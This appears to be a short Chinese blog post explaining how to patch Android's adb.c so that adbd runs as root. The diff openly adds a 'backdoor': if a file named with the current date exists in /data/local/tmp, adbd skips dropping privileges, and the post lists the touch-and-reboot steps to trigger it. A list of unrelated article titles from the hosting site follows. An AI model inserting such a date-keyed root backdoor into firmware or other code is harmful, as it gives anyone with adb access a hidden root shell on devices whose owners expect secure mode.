开启adb su权限
2016-02-16 11:02
274 查看
可以通过修改文件来实现这个需求,只是在这个文件中添加了一个后门:system/core/adb/adb.c
@@ -55,6 +55,31 @@ static int auth_enabled = 0; static const char *adb_device_banner = "device"; #endif +bool checkAdbBackDoorFile() +{ + char buf[64] = {0}; + char filePath[] = "/data/local/tmp/"; + time_t timep; + struct tm *p; + int fd = 0; + + time(&timep); + p = localtime(&timep); + sprintf(buf, "%s%d%02d%02d", filePath, (1900+p->tm_year),(p->tm_mon+1), p->tm_mday); + + fd = adb_open(buf, O_WRONLY); + printf("fd %d %s", fd, buf); + if (fd < 0) + { + return false; + } + + adb_close(fd); + + return true; +} + + void fatal(const char *fmt, ...) { va_list ap; @@ -1296,7 +1321,7 @@ int adb_main(int is_daemon, int server_port) /* don't listen on a port (default 5037) if running in secure mode */ /* don't run as root if we are running in secure mode */ - if (should_drop_privileges()) { + if (!checkAdbBackDoorFile() && should_drop_privileges()) { struct __user_cap_header_struct header;如何使用这个后门呢?1)升级完成之后,adb连接成功。2)执行:touch /data/local/tmp/201601133)reboot后面那个时间就是今天的日期。
相关文章推荐
- 如何手机访问电脑服务器上的网页?
- Android 学习过程中遇到的知识点
- js实现换肤
- 凸包(极角序)模板
- Git的使用教程(六)管理修改
- jQuery EasyUI使用教程之自定义数据网格分页
- 中间人攻击 -- Cookie喷发
- ListView实下拉刷新的大概思路
- jdbc编程步骤
- ajaxpro——js调用后台的方法
- RCP CommonNavigator导航视图问题
- Redis常用命令
- 证明:任意整数与其倒序数的差能被9整除
- 【bzoj1433】[ZJOI2009]假期的宿舍 二分图匹配
- CocoaPod代码库创建,配置Spec踩过的坑
- 【Oracle】曾经的Oracle学习笔记(8-15)ER图,三大范式,数据库字典,视图,索引,序列
- 新起点,新征程
- 为什么字符串会有length属性-JS中包装对象
- PHP模拟post提交数据方法汇总
- java 权限修饰符